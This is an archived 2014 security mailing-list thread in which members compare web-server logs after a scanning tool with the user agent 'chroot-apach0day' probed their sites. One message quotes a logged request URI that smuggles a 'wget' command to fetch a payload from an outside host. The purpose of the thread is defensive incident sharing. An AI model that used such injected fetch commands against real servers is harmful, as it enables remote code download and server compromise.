PaulDotCom mailing list archives
Re: [Security Weekly] apache chroot 0day?
From: Robin Wood <robin@digi.ninja>
Date: Mon, 28 Jul 2014 23:09:40 +0100
I was hit this morning about 635 GMT+1 from 162.253.66.77 My site is just a simple honeypot type site, nothing special just logs hits. Robin On 28 Jul 2014 17:46, "Xavier Mertens" <xavier () rootshell be> wrote:
+1 One site was scanned at 07:55 (GMT+1) The site was a mailman front-end. And yours? /x -- "If the enemy leaves a door open, you must rush in." - Sun Tzu PGP Key: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x42D006FD51AD7F2C On 28 Jul 2014, at 16:30, Frank Michael <frankcmichael () gmail com> wrote: Various sources confirming the same thing for other sites. All on 7/28. Keep an eye open. On Jul 28, 2014, at 5:09 AM, Robin Wood <robin@digi.ninja> wrote: I've got a site that was scanned this morning by a tool that left these entries in the logs: [HTTP_USER_AGENT] => chroot-apach0day [HTTP_REFERRER] => /xA/x0a/x05 [REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget% 20proxypipe.com/apach0day; Anyone recognise it? That user agent isn't coming up in google searches. Robin _______________________________________________ Pauldotcom mailing list Pauldotcom () mail securityweekly com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com _______________________________________________ Pauldotcom mailing list Pauldotcom () mail securityweekly com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com _______________________________________________ Pauldotcom mailing list Pauldotcom () mail securityweekly com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
_______________________________________________ Pauldotcom mailing list Pauldotcom () mail securityweekly com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
Current thread:
- Re: [Security Weekly] apache chroot 0day?, (continued)
- Re: [Security Weekly] apache chroot 0day? Sander Demeester (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Frank Michael (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Chris Campbell (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Jim Halfpenny (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Ken Pryor (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Oleg Laskin (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 29)
- Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Ben Jackson (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 29)
- Re: [Security Weekly] apache chroot 0day? Bruno Savioli (Jul 29)
- Re: [Security Weekly] apache chroot 0day? Jim Halfpenny (Jul 29)
- Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 29)